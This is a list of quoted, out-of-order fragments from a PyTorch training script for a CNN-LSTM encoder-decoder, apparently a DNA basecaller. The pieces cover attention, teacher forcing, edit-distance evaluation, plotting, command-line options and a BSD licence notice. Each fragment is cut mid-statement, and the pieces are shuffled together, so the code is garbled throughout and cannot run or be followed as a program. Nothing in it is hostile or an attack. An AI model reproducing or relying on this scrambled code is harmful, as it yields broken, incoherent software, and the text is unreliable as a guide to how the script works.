"nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs, true_x_len, max_label_len,",
"else: label = y[:, :, i] # batch, features, seq len if self.attention:",
"########################################### ##### Sorting ############################# ########################################### #### sort by decreasing target length sorted_len_target, sorted_idx_target",
"* 30) print(\"batch {} in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" * 30) print(\"loss=",
"scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] = acc_iteration if editD: dict_training_editd[epoch] =",
"OF THE POSSIBILITY OF SUCH DAMAGE. \"\"\" import h5py import numpy as np",
"lstm_out: [batch, seq_len, output_dim] # shape of self.hidden: (a, b), where a and",
"label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit distance vs. updates from",
"None heatmap_g_b = None heatmap_w_b = None counter_updates_teacherForcing = 0 old_ed = 0",
"ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) # cellgate, outgate start, end =",
"from matplotlib.backends.backend_pdf import PdfPages import math import torch.optim as optim from torch.utils.data import",
"dim] return outputs, hidden # Sequence to sequence model # ----------- class Seq2Seq(nn.Module):",
"torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden; attn_applied:",
"1))) print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration + 1)) * 100)) if reduce_lr: print(\"lr=",
"gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf:",
"lstm_out: [seq_len, batch, output_dim] # shape of self.hidden: (a, b), where a and",
"start, end): self.start = start self.end = end def __eq__(self, other): return self.start",
"= torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1, feature) return hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(),",
"input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for idx, u in enumerate(x_len): idx_b = 0 matrix_param",
"= np.linalg.norm(m[start: end], ord=2) # output gate start, end = n//2 + n//4,",
"decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() # with 10 reads, kernel size = 11 start",
"'--cnn_layers', type=int, default=1, help=\"Number of layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in",
"\"weight\" in name and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50, validation=True,",
"pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure()",
"# Linear mappings gates = self.i2h(x) + self.h2h(h) ingate, forgetgate, cellgate, outgate =",
"bidirectional self.port=port self.attention = attention self.dropout = dropout # Define the LSTM layer",
"port def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std,",
"teacher_forcing_ratio >= 0.5: if (running_acc_train / float(make_validation)) > 0.35 and teacher_forcing_ratio >= 0.25:",
"ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF",
"parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience in early stopping\")",
"original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2",
"''.join([vocab[int(x.item())] for x in seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target) editd += result num_chars",
"+ '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\" ))",
"= c.view(c.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings gates = self.i2h(x)",
"self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths): #hidden = self.init_hidden() # Forward pass through LSTM",
"THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND",
"# ed = 0 # ed2 = old_ed # # old_ed = ed2",
"= random.random() out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target,",
"= train_ds[5] #Get training data train_loader = get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10, batch_size=batch_size,",
"make a checkpoint of the current model if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates)",
"zip(input, [\"input gate\", \"forget gate\", \"cell activation\", \"out gate\"]): i += 1 ax",
"> 0: # remove neagtive samples negative_idx = seq_len_cnn > 0 seq_len_cnn =",
"x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units',",
"[max. target length, batch size, output dim] top1 = input_decoder.argmax(1) # get argmax",
"val_set[4].size(), val_set[5].size()) # [batch size] is typically chosen between 1 and a few",
"help=\"Number of output channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number of layers",
"default=Range(0.0, 1.0), help=\"Teacher forcing ratio. Default=1, TF on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\")",
"x batch_size x out_size return out_decoder, labels_sorted, sorted_len_target # In[ ]: def get_train_loader_trainVal(tensor_x,",
"default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"dict_classes = {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOF>\", 5:",
"in y_len: if \"bias\" in name and \"lstm\" in name and \"linear\" not",
"optimizer, updates) if early_stopping.early_stop: print(\"Early stopping\") break if reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch]",
"parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") # early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"features, seq len if self.attention: # ATTENTION MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i,",
"train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds = val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path +",
"<= 0.).sum().item() > 0: # remove neagtive samples negative_idx = seq_len_cnn > 0",
"total_ed += ed_val total_num_chars += num_char_ref if editD: cer = float(total_ed) / total_num_chars",
"= np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss =",
"/ float(make_validation)) > 0.35 and teacher_forcing_ratio >= 0.25: # if we have reached",
"args.gradient_clip # LSTM hidden = args.hidden_units #256 forget_bias = args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder",
"{}\".format(label, title)) if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename,",
"= plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1)",
"= {} dict_activations_forget_decoder = {} dict_activations_cell_decoder = {} dict_activations_out_decoder = {} dict_training_loss =",
"output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional = bidirectional self.port = port self.dropout=dropout # Define",
"original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :, :] return",
"SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set = read_data[0] val_set = read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port),",
"nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val, editd_train,",
"= (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :, :] # sort labels so that",
"inputs, labels, labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size x",
"oder batch sortieren # unsort the output _, original_idx = sorted_idx.sort(0, descending=False) #",
"== 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title)) if pdf is not None: pdf.savefig(fig,",
"= args.drop_prob call = args.call lr = args.learning_rate editD = args.editD sgd =",
"unpacked_original = unpacked[original_idx, :, :] return hidden_original, unpacked_original # The Decoder # -----------",
"teacher_force else onehot # [batch size, out dim] return outputs, hidden # Sequence",
"of self.hidden: (a, b), where a and b both have shape (num_layers, batch_size,",
"loop print(\"Early stopping\") break model.train() epoch_loss = 0 epoch_acc = 0 epoch_loss_val =",
"and \"linear\" not in name: for b in [\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name",
"polyleven import levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping import EarlyStopping from cnn import SimpleCNN,",
"label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from trainings set\")",
"outgate = gates.chunk(4, 1) ingate = F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate = F.tanh(cellgate)",
"in descending order #print(\"in length\", x_lengths) sorted_len, sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx =",
"in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS",
"* 100)) if reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \",",
"plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False): x_len = list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input =",
"port = args.gpu_port SEED = args.set_seed batch = args.batch_size epochs = args.epochs make_validation",
"PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD)",
"* CNN-Encoder # * LSTM-Encoder # * LSTM-Decoder # The Encoder # -----------",
"idx_b += 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x in y_len] df",
", kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on, dropout_p = dropout_probability,",
"CNN, lstm_encoder = lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param in model12.named_parameters():",
"= pickle.load(handle) save_files_path = script_dir + '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set",
"batch, features, seq len if self.attention: # ATTENTION MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:,",
"help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # LSTM arguments parser.add_argument(\"--attention\",",
"\"<EOF>\", 5: \"<PAD>\"} # A=0, C=1, G=2, T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) #",
"[batch, seq_len, output_dim] # shape of self.hidden: (a, b), where a and b",
"OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY",
"for input x is [batch, seq_len, input_dim] def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5,",
"seq: if p == 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())]",
"list(acc_train.values())], label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100 for v in list(acc_val.values())], label=\"validation accuracy\")",
"plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates\") if editD: ax = fig.add_subplot(1, 3,",
"input[0], input[1], input[2], input[3], input[4], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2,",
"# The Decoder # ----------- class LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True, port=1):",
"# print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration + 1)))) if updates % make_validation ==",
"\"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val +",
"np.zeros((len(y_len_biases), len(x_len))) for idx, u in enumerate(x_len): idx_b = 0 matrix_param = dict_weights[u]",
"end = n//2, n//2 + n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end], ord=2) #",
"at regular intervals if epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\",",
"default=True) parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number",
"n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration + 1))",
"# ed2 = ed # else: # ed = 0 # ed2 =",
"ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance",
"outgate * F.tanh(cy) #print(\"hy\", hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1, feature)",
"acc_val running_acc_val += acc_val val_acc.append(acc_val) if editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val)",
"gate bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() # with 10 reads, kernel size =",
"decoder must be equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and decoder must have",
"= nn.Linear(self.hidden_dim * 4, 1) #self.attn = nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2)",
"self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True,",
"shape (num_layers, batch_size, hidden_dim). if self.bidirectional: hidden1 = hidden[0] hidden2 = hidden[1] h1",
"error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from trainings set\") ax = fig.add_subplot(1,",
"self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout)",
"max_in_batch: break # when seq length (i) >= true seq length if i",
"label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates from",
"attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder:",
"ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\") ax = fig.add_subplot(1,",
"#print(\"hy\", hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1, feature) cy = torch.unsqueeze(cy,",
"\"cell activation\", \"out gate\"]): i += 1 ax = fig.add_subplot(2, 2, i) for",
"i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden; attn_applied: b, 1,",
"f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val],",
"editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration + 1)))) if updates % make_validation",
"x seq_length x input_size #### LSTM if (seq_len_cnn <= 0.).sum().item() > 0: #",
"n_epochs)) print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration + 1))) print(\"acc= {0:.4f} %\".format((epoch_acc",
"epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())),",
"mode=\"train\", shuffle=True, patience = 25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print all of",
"clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder and decoder optimizer.step() if (val_ds",
"seq_length output, sorted_labels, sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1), mode)",
"if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs for epoch in range(n_epochs):",
"== max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy())) # this locator puts ticks at regular",
"= args.cnn_layers batch_normalization = args.batch_norm dropout_on = args.dropout_cnn dropout_input = args.dropout_input dropout_probability =",
"args.channel_number #256 pooling_type = args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers batch_normalization = args.batch_norm dropout_on",
"args.drop_prob call = args.call lr = args.learning_rate editD = args.editD sgd = False",
"self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) self.port = port def reset_parameters(self): std",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") # early stopping parser.add_argument(\"--early_stop\", type=lambda",
"= args.channel_number #256 pooling_type = args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers batch_normalization = args.batch_norm",
"output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir, port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim =",
"= x.gather(0, index_sorted_idx.long()) # [batch, seq_len, input_dim] # pack_padded_sequence so that padded items",
"disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE",
"editD=editD) end = time.time() hours, rem = divmod(end-start, 3600) minutes, seconds = divmod(rem,",
"* 2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention: # attention self.attn =",
"EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,",
"help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number of hidden units in Encoder-Decoder-LSTM\")",
"idx, length in enumerate(target_lengths): length = int(length.item()) seq = pred[idx] seq_target = target[idx]",
"validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close()",
"on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda",
"stopping\") break model.train() epoch_loss = 0 epoch_acc = 0 epoch_loss_val = 0 epoch_acc_val",
"\"bias\" in name and \"lstm\" in name and \"linear\" not in name: for",
"= {} dict_training_loss = {} dict_validation_loss = {} dict_training_acc = {} dict_validation_acc =",
"update= \", updates, \", half of updates= \", int((len(train_loader) * n_epochs)*0.5)) # Backward",
"0, n//4 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) # cellgate,",
"seq_length output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val, 0, labels_val, lab_len_val, labels10_val, labels_val.size(1), mode)",
"default=1, help=\"Port on GPU mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size',",
"DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,",
"time.time() out12 = trainNet( model12, train_ds = train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds =",
":, :] return hidden_original, unpacked_original # The Decoder # ----------- class LSTMCellDecoder(nn.Module): def",
"size\") parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number of epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make",
"The Decoder # ----------- class LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder,",
"shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10) # create your datset train_loader",
"epoch_loss = 0 epoch_acc = 0 epoch_loss_val = 0 epoch_acc_val = 0 epoch_editd_val",
"else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates)",
"\"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x in y_len_biases]",
"rights reserved. Redistribution and use in source and binary forms, with or without",
"Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates\") if pdf is not None: pdf.savefig(fig,",
"\"linear\" not in name: print(name,param.data.size()) n = param.size(0) # forget gate start, end",
"= args.batch_norm dropout_on = args.dropout_cnn dropout_input = args.dropout_input dropout_probability = args.drop_prob call =",
"save_files_path = script_dir + '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set = read_data[0]",
"'--channel_number', type=int, default=256, help=\"Number of output channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1,",
"target[idx] encoded_pred = [] for p in seq: if p == 4: break",
"0.0 updates = 0 heatmap_g = None heatmap_w = None heatmap_g_b = None",
"(updates % make_validation == 0): # or (updates == n_epochs-1)): if reduced_TF: #if",
"print(\"batch {} in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss /",
"dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates)",
"# cellgate, outgate start, end = n//2, n # ordering ingate, forgetgate, cellgate,",
"# self.reset_parameters() def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w in self.parameters():",
"hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1)",
"= F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim) --> (batch_size, out_dim) #decide if we are",
"type=int, default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number of epochs\") parser.add_argument('-v', '--make_validation',",
"args.dropout # CNN input_bias_cnn = args.input_bias_cnn strides = args.strides kernel = args.kernel cnn_out",
"output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir, port=port, attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder =",
"= 0 # ed2 = old_ed # # old_ed = ed2 # epoch_editd",
"acc_val val_acc.append(acc_val) if editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val",
"self.cnn_encoder = cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim,",
"input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim",
"hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias =",
"def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder",
"if split_LSTMbiases: y_len_biases = [] for name in y_len: if \"bias\" in name",
"wspace=0.5) i = 0 for p, label in zip(input, [\"input gate\", \"forget gate\",",
"end], ord=2) # forget gate start, end = n//4, n//2 input_biases[idx_b+1, idx] =",
"trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train],",
"loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation",
"EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS",
"plt.switch_backend('agg') class Range(object): def __init__(self, start, end): self.start = start self.end = end",
"max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val],",
"dropout # Define the LSTM layer if self.bidirectional: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2,",
"lstm_in: [batch, input_dim] # shape of lstm_out: [seq_len, batch, output_dim] # shape of",
"checkpoint of the current model if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates) if early_stopping.early_stop:",
"{:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1)) *",
"= int(max(true_y_len.cpu())) start_seq = True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token =",
"smallest element = last one #print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :] # get",
"lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim",
"np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from trainings",
"signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5]))",
"{} running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val = 0.0",
"print(\"=\" * 100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] = val_acc if editD: dict_validation_editd[epoch] =",
"updates % make_validation == 0: # ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2",
"loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc",
"EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) # script directory file_out = script_dir + \"/\" +",
"4 * hidden_size, bias=bias) # self.reset_parameters() def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size)",
").sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val += acc_val val_acc.append(acc_val) if editD: ed_val,",
"x, hidden): h, c = hidden h = h.view(x.size(0), -1) c = c.view(x.size(0),",
"read_train = train_ds[5] #Get training data train_loader = get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10,",
